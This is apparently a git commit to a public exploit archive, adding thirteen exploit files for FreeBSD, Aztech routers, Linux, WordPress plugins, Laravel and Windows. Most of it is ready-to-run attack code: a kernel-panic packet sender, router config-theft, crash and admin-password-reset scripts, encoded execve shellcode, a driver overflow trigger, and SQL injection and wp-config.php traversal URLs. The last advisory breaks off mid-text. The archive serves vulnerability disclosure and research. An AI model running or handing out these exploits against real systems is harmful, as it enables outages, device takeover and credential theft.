From 386bdfe50db4ff95049531e63c4d5cdd28c3e73c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 26 Jan 2016 05:03:56 +0000 Subject: [PATCH] DB: 2016-01-26 13 new exploits --- files.csv | 13 + platforms/freebsd/dos/39305.py | 44 +++ platforms/hardware/remote/39314.c | 37 +++ platforms/hardware/remote/39315.pl | 42 +++ platforms/hardware/remote/39316.pl | 81 ++++++ platforms/lin_x86-64/shellcode/39312.c | 65 +++++ platforms/linux/dos/39308.c | 76 +++++ platforms/multiple/remote/39318.txt | 39 +++ platforms/php/webapps/39306.html | 375 +++++++++++++++++++++++++ platforms/php/webapps/39309.txt | 190 +++++++++++++ platforms/php/webapps/39313.txt | 9 + platforms/php/webapps/39317.txt | 12 + platforms/windows/local/39310.txt | 38 +++ platforms/windows/local/39311.txt | 45 +++ 14 files changed, 1066 insertions(+) create mode 100755 platforms/freebsd/dos/39305.py create mode 100755 platforms/hardware/remote/39314.c create mode 100755 platforms/hardware/remote/39315.pl create mode 100755 platforms/hardware/remote/39316.pl create mode 100755 platforms/lin_x86-64/shellcode/39312.c create mode 100755 platforms/linux/dos/39308.c create mode 100755 platforms/multiple/remote/39318.txt create mode 100755 platforms/php/webapps/39306.html create mode 100755 platforms/php/webapps/39309.txt create mode 100755 platforms/php/webapps/39313.txt create mode 100755 platforms/php/webapps/39317.txt create mode 100755 platforms/windows/local/39310.txt create mode 100755 platforms/windows/local/39311.txt diff --git a/files.csv b/files.csv index bfb0d8044..922acbdf6 100755 --- a/files.csv +++ b/files.csv @@ -35545,3 +35545,16 @@ id,file,description,date,author,platform,type,port 39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0 +39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 Error Processing Vulnerability",2016-01-25,ptsecurity,freebsd,dos,0 +39306,platforms/php/webapps/39306.html,"pfSense Firewall <= 2.2.5 - Config File CSRF",2016-01-25,"Aatif Shahdad",php,webapps,443 +39308,platforms/linux/dos/39308.c,"Linux Kernel - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 +39309,platforms/php/webapps/39309.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 +39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 +39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 +39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0 +39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0 +39315,platforms/hardware/remote/39315.pl,"Multiple Aztech Routers '/cgi-bin/AZ_Retrain.cgi' Denial of Service Vulnerability",2014-09-15,"Federick Joe P Fajardo",hardware,remote,0 +39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0 +39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 +39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0 diff --git a/platforms/freebsd/dos/39305.py b/platforms/freebsd/dos/39305.py new file mode 100755 index 000000000..51013f9af --- /dev/null +++ b/platforms/freebsd/dos/39305.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +''' +Source: http://blog.ptsecurity.com/2016/01/severe-vulnerabilities-detected-in.html + +SCTP (stream control transmission protocol) is a transport-layer protocol designed to transfer signaling messages in an IP environment. As a rule, mobile operators use this protocol in technological networks. + +This vulnerability threatens FreeBSD systems (versions 9.3, 10.1, and 10.2) if they support SCTP and IPv6 (default configuration). To exploit this flaw, a malefactor needs to send a specially crafted ICMPv6 message. And if he succeeds, he can conduct a DoS attack. + +Denial of service is caused by improper check of the length of an SCTP packet header received from the ICMPv6 error message. If the target recipient is unavailable, the router can generate an error message and send it to the sender via ICMPv6. + +This ICMPv6 packet includes the original IPv6 packet where the Next Header field indicates how SCTP is encapsulated. + +When the kernel receives the error message via ICMPv6, it transfers the upper-level protocol packet to a necessary parser (sctp6_ctlinput()). The SCTP parser considers the incoming header has the required length, tries to copy it using m_copydata(), which has offset values and the number of bytes. Since a twelve-byte chunk is expected, if the attacker sends a packet with an eleven-byte header, a NULL pointer is dereferenced causing kernel panic. + +There is no need for an open SCTP socket to successfully exploit this vulnerability. Scapy can help to create an ICMPv6 packet. +''' + +import argparse +from scapy.all import * + + +def get_args(): + parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78) + parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address") + parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address") + parser.add_argument("-I", "--iface", type=str, help="Iface") + options = parser.parse_args() + + if options.dst_mac is None or options.dst_ipv6 is None: + parser.print_help() + exit() + + return options + + +if __name__ == '__main__': + options = get_args() + + sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132, + src=options.dst_ipv6, + dst='fe80::230:56ff:fea6:648c'), + iface=options.iface) \ No newline at end of file diff --git a/platforms/hardware/remote/39314.c b/platforms/hardware/remote/39314.c new file mode 100755 index 000000000..2ff7e9b65 --- /dev/null +++ b/platforms/hardware/remote/39314.c @@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/69808/info + +Aztech Modem Routers are prone to an information-disclosure vulnerability. + +An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. + +HOST=$1 +PORT=$2 +PARM1="\x48\x6f\x73\x74\x3a\x20" +PARM2="\x50\x72\x6f\x78\x79\x2d\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65" +PARM3="\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38" +PARM4="\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x33\x37\x2e\x30\x2e\x32\x30\x36\x32\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36" +PARM5="\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x61\x64\x6d\x53\x65\x74\x74\x69\x6e\x67\x73\x2e\x61\x73\x70" +PARM6="\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61\x74\x65\x2c\x73\x64\x63\x68" +PARM7="\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38" + +NARGS=1 +BARGS=65 +main() { + printf "\---------------------------------------------\n"; + printf "++ Aztech Modem Get Configuration File Exploit\n"; + printf "++ Usage: $0 TARGET PORT\n"; + printf "++ Ex: $0 192.168.254.254 80\n\n"; + +} + +[[ $# -le $NARGS ]] && main && exit $BARGS + +curl -i -H "$PARM1" \ + -H "$PARM2" \ + -H "$PARM3" \ + -H "$PARM4" \ + -H "$PARM5" \ + -H "$PARM6" \ + -H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg + + diff --git a/platforms/hardware/remote/39315.pl b/platforms/hardware/remote/39315.pl new file mode 100755 index 000000000..cea7a27cc --- /dev/null +++ b/platforms/hardware/remote/39315.pl @@ -0,0 +1,42 @@ +source: http://www.securityfocus.com/bid/69809/info + +Multiple Aztech routers are prone to a denial-of-service vulnerability. + +Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition. + +Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable. + +#!/usr/bin/perl +use strict; +use IO::Socket; + +if(!defined($ARGV[0])) { +system ('clear'); +print "---------------------------------------------\n"; +print "++ Aztech Modem Denial of Service Attack\n"; +print "++ Usage: perl $0 TARGET:PORT\n"; +print "++ Ex: perl $0 192.168.254.254:80\n\n"; +exit; +} + +my $TARGET = $ARGV[0]; +my ($HOST, $PORT)= split(':',$TARGET); +my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69"; + +system ('clear'); +print "---------------------------------------------\n"; +print "++ Resetting WAN modem $TARGET\n"; + +my $POST = "GET $PATH HTTP/1.1"; +my $ACCEPT = "Accept: text/html"; + +my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock; + +print $sock "$POST\n"; +print $sock "$ACCEPT\n\n"; +print "++ Sent. The modem should be disconnected by now.\n"; +$sock->close(); + +exit; + + diff --git a/platforms/hardware/remote/39316.pl b/platforms/hardware/remote/39316.pl new file mode 100755 index 000000000..bc3885ee5 --- /dev/null +++ b/platforms/hardware/remote/39316.pl @@ -0,0 +1,81 @@ +source: http://www.securityfocus.com/bid/69811/info + +Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability. + +An attacker can exploit this issue to gain unauthorized access to the affected device. + +#!/usr/bin/perl +# Title: Aztech Modem Broken Session Management Exploit +# Author: Eric Fajardo - fjpfajardo@ph.ibm.com +# +# A successful authentication of a privilege (admin) ID in the +# web portal allows any attacker in the network to hijack and +# reuse the existing session in order to trick and allow the web +# server to execute administrative commands. The command may be +# freely executed from any terminal in the network as long as +# the session of the privilege ID is valid. The below PoC shows +# an un-authenticated request to the web server for an administrator +# and user password reset. +# +# This exploit was tested working with the following modems: +# - DSL5018EN(1T1R) from Globe Telecom +# - DSL705E +# - DSL705EU + +use strict; +use IO::Socket; + +if(!defined($ARGV[0])) { +system ('clear'); +print "---------------------------------------------\n"; +print "++ Aztech Modem Broken Session Management Exploit\n"; +print "++ Usage: perl $0 TARGET:PORT NEWPASSWORD\n"; +print "++ Ex: perl $0 192.168.254.254:80 h4rh4rHaR\n\n"; +exit; +} + +my $TARGET = $ARGV[0]; +my $NEWPASS = $ARGV[1]; +my ($HOST, $PORT)= split(':',$TARGET); +my $PATH = "/cgi-bin/admAccess.asp"; + +system ('clear'); +print "---------------------------------------------\n"; +print "++ Sending POST string to $TARGET ...\n"; + +my $PAYLOAD = "saveFlag=1&adminFlag=1&SaveBtn=SAVE&uiViewTools_Password=$NEWPASS&uiViewTools_PasswordConfirm=$NEWPASS&uiViewTools_Password1=$NEWPASS&uiViewTools_PasswordConfirm1=$NEWPASS"; +my $POST = "POST $PATH HTTP/1.1"; + +my $ACCEPT = "Accept: text/html, application/xhtml+xml, */*"; +my $REFERER = "Referer: http://$HOST/cgi-bin/admAccess.asp"; +my $LANG = "Accept-Language: en-US"; +my $AGENT = "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"; +my $CONTYPE = "Content-Type: application/x-www-form-urlencoded"; +my $ACENCODING = "Accept-Encoding: gzip, deflate"; +my $PROXYCONN = "Proxy-Connection: Keep-Alive"; +my $CONNLENGTH = "Content-Length: 179"; +my $DNT = "DNT: 1"; +my $TARGETHOST = "Host: $HOST"; +my $PRAGMA = "Pragma: no-cache"; + +my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock; + +print $sock "$POST\n"; +print $sock "$ACCEPT\n"; +print $sock "$REFERER\n"; +print $sock "$LANG\n"; +print $sock "$AGENT\n"; +print $sock "$CONTYPE\n"; +print $sock "$ACENCODING\n"; +print $sock "$PROXYCONN\n"; +print $sock "$CONNLENGTH\n"; +print $sock "$DNT\n"; +print $sock "$TARGETHOST\n"; +print $sock "$PRAGMA\n\n"; +print $sock "$PAYLOAD\n"; + +print "++ Sent. Connect to the web URL http://$HOST with user:admin password:$NEWPASS\n"; +$sock->close(); +exit; + + diff --git a/platforms/lin_x86-64/shellcode/39312.c b/platforms/lin_x86-64/shellcode/39312.c new file mode 100755 index 000000000..08240868a --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39312.c @@ -0,0 +1,65 @@ +/*--------------------------------------------------------------------------------------------------------------------- +/* +*Title: x86_64 linux-Xor/not/div encoded execve shellcode +*Author: Sathish kumar +*Contact: https://www.linkedin.com/in/sathish94 +* Copyright: (c) 2016 iQube. (http://iQube.io) +* Release Date: January 6, 2016 +*Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes +*Tested On: Ubuntu 14.04 LTS +*SLAE64-1408 +*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell +* ./bindshell +* +* +*/ +/* +global _start +section .text +_start: + + +jmp short call_shellcode + + +decoder: + pop rdi + xor rcx, rcx + xor rdx, rdx + xor rax, rax + mov cl, 26 + +decode: + not byte [rdi] ; not function is appplied + xor byte [rdi], 0xee ; xor function with 0xee + mov rax, rdi ; multiplication is done + mov ecx, 0x2 + mul ecx + mov rdi, rax + inc rdi + loop decode ; loop continues until the shellcode size is completed + + jmp short shellcode_to_decode ; Pointed to the decoded shellcode + +call_shellcode: + call decoder + shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13 +*/ + +#include +#include + +unsigned char code[] = \ +"\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19"; +main() +{ + + printf("Shellcode Length: %d\n", (int)strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} + + diff --git a/platforms/linux/dos/39308.c b/platforms/linux/dos/39308.c new file mode 100755 index 000000000..363440505 --- /dev/null +++ b/platforms/linux/dos/39308.c @@ -0,0 +1,76 @@ +/* + * Coder: Shawn the R0ck, [citypw@gmail.com] + * Co-worker: Pray3r, [pray3r.z@gmail.com] + * Compile: + * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie + * # ./a.out wlan0 + * Boom......shit happens[ as always];-) +*/ + +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char v_U8_t; +#define HDD_MAX_CMP_PER_PACKET_FILTER 5 + +struct PacketFilterParamsCfg { + v_U8_t protocolLayer; + v_U8_t cmpFlag; + v_U8_t dataOffset; + v_U8_t dataLength; + v_U8_t compareData[8]; + v_U8_t dataMask[8]; +}; + +typedef struct { + v_U8_t filterAction; + v_U8_t filterId; + v_U8_t numParams; + struct PacketFilterParamsCfg + paramsData[HDD_MAX_CMP_PER_PACKET_FILTER]; +} tPacketFilterCfg, *tpPacketFilterCfg; + +int main(int argc, const char *argv[]) +{ + if (argc != 2) { + fprintf(stderr, "Bad usage\n"); + fprintf(stderr, "Usage: %s ifname\n", argv[0]); + return -1; + } + + struct iwreq req; + strcpy(req.ifr_ifrn.ifrn_name, argv[1]); + int fd, status, i = 0; + fd = socket(AF_INET, SOCK_DGRAM, 0); + tPacketFilterCfg p_req; + + /* crafting a data structure to triggering the code path */ + req.u.data.pointer = + malloc(sizeof(v_U8_t) * 3 + + sizeof(struct PacketFilterParamsCfg) * 5); + p_req.filterAction = 1; + p_req.filterId = 0; + p_req.numParams = 3; + for (; i < 5; i++) { + p_req.paramsData[i].dataLength = 241; + memset(&p_req.paramsData[i].compareData, 0x41, 16); + } + + memcpy(req.u.data.pointer, &p_req, + sizeof(v_U8_t) * 3 + + sizeof(struct PacketFilterParamsCfg) * 5); + + if (ioctl(fd, 0x8bf7, &req) == -1) { + fprintf(stderr, "Failed ioct() get on interface %s: %s\n", + argv[1], strerror(errno)); + } else { + printf("You shouldn't see this msg...\n"); + } + +} diff --git a/platforms/multiple/remote/39318.txt b/platforms/multiple/remote/39318.txt new file mode 100755 index 000000000..d463133a6 --- /dev/null +++ b/platforms/multiple/remote/39318.txt @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/69849/info + +Laravel is prone to a security weakness due to pseudo password hash collision. + +Attackers can exploit this issue to bypass intended security restrictions. This may aid in further attacks. + +// user input password +$input = str_repeat('A',72); +// plaintext password +$pass1 = +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'mysupersecretpassword'; +$pass2 = +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'longcatishere'; +// hashed password +$hash1 = Hash::make($pass1); +$hash2 = Hash::make($pass2); +// match? +$status1 = Hash::check($input, $hash1)?'Yes':'No'; +$status2 = Hash::check($input, $hash2)?'Yes':'No'; + +User 1 +Desc. Value +$input +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +$pass1 +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmysupersecretpassword +Hash::make($pass1) +$2y$10$9oMcpTwHgTzR5ZUMqlnMMOx/P18QZ5e9054lq.pwxw1O9urX3JHHu +Hash::check($input, $hash1) Yes + +User 2 +Desc. Value +$input +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +$pass2 +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlongcatishere +Hash::make($pass2) +$2y$10$W7wwB4nLmFjrenJGmx1uauqhjzikZNZA0qzxH8wkbiSmVatCYrAUm +Hash::check($input, $hash2) Yes diff --git a/platforms/php/webapps/39306.html b/platforms/php/webapps/39306.html new file mode 100755 index 000000000..c26121b6f --- /dev/null +++ b/platforms/php/webapps/39306.html @@ -0,0 +1,375 @@ + + + + + +
+ +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39309.txt b/platforms/php/webapps/39309.txt new file mode 100755 index 000000000..554bf3f95 --- /dev/null +++ b/platforms/php/webapps/39309.txt @@ -0,0 +1,190 @@ +# Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Unauthenticated SQL injection +# Date: 2016-01-26 +# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/ +# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] --[now i0 security-lab] +# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form +# Vendor: CodePeople.net +# Vebdor URI: http://codepeople.net +# Version: 1.1.23 +# OWASP Top10: A1-Injection +# Tested on: windows 10 + firefox + sqlmap 1.0. + +=================== +PRODUCT DESCRIPTION +=================== +"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in +a calendar**. The booking form is linked to a **PayPal** payment process. + +You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities +where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings +that can be accepted for each time-slot." + +(copy of readme file) + + +====================== +EXPLOITATION TECHNIQUE +====================== +remote + +============== +SEVERITY LEVEL +============== + +critical + +================================ +TECHNICAL DETAILS && DESCRIPTION +================================ + +A unauthenticated SQL injection flaw was discovered within the latest WordPress +appointment-booking-calendar plugin version 1.1.23. + +The flaw were found in the function that is executed when the action ´cpabc_appointments_check_IPN_verification´ is called. +The action is added with ´init´ tag, so it function is called every time when parameter ´action=cpabc_appointments_check_IPN_verification´ +appear in the query string (GET request) or POST request. + +But for to execute the vulnerable line of code, an attacker need to carry out some conditions: +- The query string must contain the ´cpabc_ipncheck´ parameter. +- The ´cpabc_ipncheck´ must have the value ´1´. +- The query string must contain the ´itemnumber´ parameter (it is necessary for injection). + +By having all those rules, the attacker can exploit the vulnerability. + +The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker +can compromise the entire web server. + +================ +PROOF OF CONCEPT +================ + +An unauthenticated attacker can make a request like... + +http:////wp-admin/admin-ajax.php?action=cpabc_appointments_check_IPN_verification +&cpabc_ipncheck=1&itemnumber= + +Example: + + Exploiting simple SQL injection: + + http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_check_IPN_verification + &cpabc_ipncheck=1&itemnumber=(SELECT * FROM (SELECT(SLEEP(5)))Qmyx) + + Exploiting second order SQL injection with ´CHAR´ function will append ´0 or sleep(10)#´ to second sql statement: + + http://localhost/wordpress4.0.1/wp-admin/admin-ajax.php?action=cpabc_appointments_check_IPN_verification + &cpabc_ipncheck=1&itemnumber=-1 UNION SELECT 1,CHAR (48,32,111,114,32,115,108,101,101,112,40,49,48,41,35),3,4,5,6,7,8,9,10,11# + + + +=============== +VULNERABLE CODE +=============== + +located in ´cpabc_appointments.php´ + +function cpabc_appointments_check_IPN_verification() { + + global $wpdb; + + if ( ! isset( $_GET['cpabc_ipncheck'] ) || $_GET['cpabc_ipncheck'] != '1' || ! isset( $_GET["itemnumber"] ) ) + return; + ... + + //HERE IS SANITIZED (when we inject a sql statement the `intval` function value turn to 0 and never is executed the `if` code) + $myrows = $wpdb->get_results( "SELECT * FROM ".CPABC_TDEAPP_CALENDAR_DATA_TABLE." WHERE reference='".intval($itemnumber[0])."'" ); + if (count($myrows)) + { + echo 'OK - Already processed'; + exit; + } + //BUT HERE THE PARAMETER IS PASSED WITHOUT SANITIZATION + cpabc_process_ready_to_go_appointment($_GET["itemnumber"], $payer_email); + + echo 'OK'; + + exit(); + +} + + +Now let's verify the ´cpabc_process_ready_to_go_appointment´ function... + +function cpabc_process_ready_to_go_appointment($itemnumber, $payer_email = "") +{ + global $wpdb; + + ... + + $itemnumber = explode(";",$itemnumber); //CONVERTING INTO AN ARRAY THE SUPPLIED PARAMETER + $myrows = $wpdb->get_results( "SELECT * FROM ".CPABC_APPOINTMENTS_TABLE_NAME." WHERE id=".$itemnumber[0] ); //THERE IS NO SANITIZATION + + //NEXT INSTRUCTION IS USEFUL FOR SECOND ORDER SQL INJECTION + $mycalendarrows = $wpdb->get_results( 'SELECT * FROM '.CPABC_APPOINTMENTS_CONFIG_TABLE_NAME .' WHERE `'.CPABC_TDEAPP_CONFIG_ID.'`='.$myrows[0]->calendar); + $reminder_timeline = date( "Y-m-d H:i:s", strtotime (date("Y-m-d H:i:s")." +".$mycalendarrows[0]->reminder_hours." hours") ); + if (!defined('CP_CALENDAR_ID')) + define ('CP_CALENDAR_ID',$myrows[0]->calendar); + + ... + + $params = unserialize($myrows[0]->buffered_date); //POTENTIAL RISKY `unserialize` METHOD CALLED use json functions instead + $attachments = array(); + foreach ($params as $item => $value) + { + $email_content1 = str_replace('<%'.$item.'%>',(is_array($value)?(implode(", ",$value)):($value)),$email_content1); + $email_content2 = str_replace('<%'.$item.'%>',(is_array($value)?(implode(", ",$value)):($value)),$email_content2); + $email_content1 = str_replace('%'.$item.'%',(is_array($value)?(implode(", ",$value)):($value)),$email_content1); + $email_content2 = str_replace('%'.$item.'%',(is_array($value)?(implode(", ",$value)):($value)),$email_content2); + if (strpos($item,"_link")) + $attachments[] = $value; + } + $buffered_dates = array(); + for ($n=0;$nget_results( "SELECT * FROM ".CPABC_APPOINTMENTS_TABLE_NAME." WHERE id=".$itemnumber[$n] ); + $buffered_dates[] = $myrows[0]->booked_time; + $information = $mycalendarrows[0]->uname."\n". + $myrows[0]->booked_time."\n". + ($myrows[0]->name?$myrows[0]->name."\n":""). + $myrows[0]->email."\n". + ($myrows[0]->phone?$myrows[0]->phone."\n":""). + $myrows[0]->question."\n"; + + ... + + //USEFUL FOR STORED CROSS-SITE SCRIPTING + $rows_affected = $wpdb->insert( CPABC_TDEAPP_CALENDAR_DATA_TABLE, array( 'appointment_calendar_id' => $myrows[0]->calendar, + 'datatime' => date("Y-m-d H:i:s", strtotime($myrows[0]->booked_time_unformatted)), + 'title' => $myrows[0]->email, + 'reminder' => $reminder, + 'quantity' => (isset($myrows[0]->quantity)?$myrows[0]->quantity:1), + 'description' => str_replace("\n","
", $information), + 'reference' => $itemnumber[$n] + ) ); + + } +} + + + +========== + CREDITS +========== + +Vulnerability discovered by: + Joaquin Ramirez Martinez [i0 security-lab] + joaquin.ramirez.mtz.lab[at]gmail[dot]com + https://www.facebook.com/I0-security-lab-524954460988147/ + https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q + + +======== +TIMELINE +======== + +2016-01-08 vulnerability discovered +2016-01-24 reported to vendor +2016-01-25 released appointment-booking-calendar 1.1.24 +2016-01-26 full disclosure diff --git a/platforms/php/webapps/39313.txt b/platforms/php/webapps/39313.txt new file mode 100755 index 000000000..df644df72 --- /dev/null +++ b/platforms/php/webapps/39313.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/69787/info + +Food Order Portal is prone to a cross-site request-forgery vulnerability. + +An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. + +Food Order Portal 8.3 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/admin_user_delete.php?admin_id=[ADMIN ID] \ No newline at end of file diff --git a/platforms/php/webapps/39317.txt b/platforms/php/webapps/39317.txt new file mode 100755 index 000000000..e61b9ace7 --- /dev/null +++ b/platforms/php/webapps/39317.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/69815/info + +The Wordfence Security Plugin for WordPress is prone to following vulnerabilities: + +1. Multiple HTML-Injection vulnerabilities +2. Multiple Security Bypass vulnerabilities + +Successful exploits of these issues allow the attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user, or to bypass security mechanisms. + +Wordfence Security Plugin 5.2.3 is vulnerable; other versions may also be affected + +http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php \ No newline at end of file diff --git a/platforms/windows/local/39310.txt b/platforms/windows/local/39310.txt new file mode 100755 index 000000000..a1e347279 --- /dev/null +++ b/platforms/windows/local/39310.txt @@ -0,0 +1,38 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=589 + +Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 +Platform: Windows 8.1, not tested any other OS +Class: Security Feature Bypass + +Summary: +The fix for CVE-2015-2553 can be bypassed to get limited mount reparse points working again for sandbox attacks by abusing anonymous token impersonation. + +Description: + +This is another way of bypassing fix introduced in CVE-2015-2553 to block access to creating mount point reparse points. In this case instead of using the per-process device map directory we can use the fact that the anonymous token can support a per-user device map directory. If this doesn’t exist (which seems to be rare it gets created) the kernel uses ZwCreateDirectoryObject inside SeGetTokenDeviceMap. + +So instead of creating an anonymous directory object and setting it as the per-process device map we do everything while impersonating the anonymous token and open \?? as the root directory. We can then use the same trick as in the original PoC to set the mount point by pointing it at \Device\NamedPipe. This works because traversal is not blocked due to you not fixing MSRC case 21132. + +I guess this could be fixed by passing the OBJ_IGNORE_IMPERSONATED_DEVICEMAP flag when checking for the writable directory, but of course that might go horribly wrong somewhere. Or perhaps the anonymous authentication ID shouldn’t create a per-user device map? + +This does have a limitation from the previous attack as it 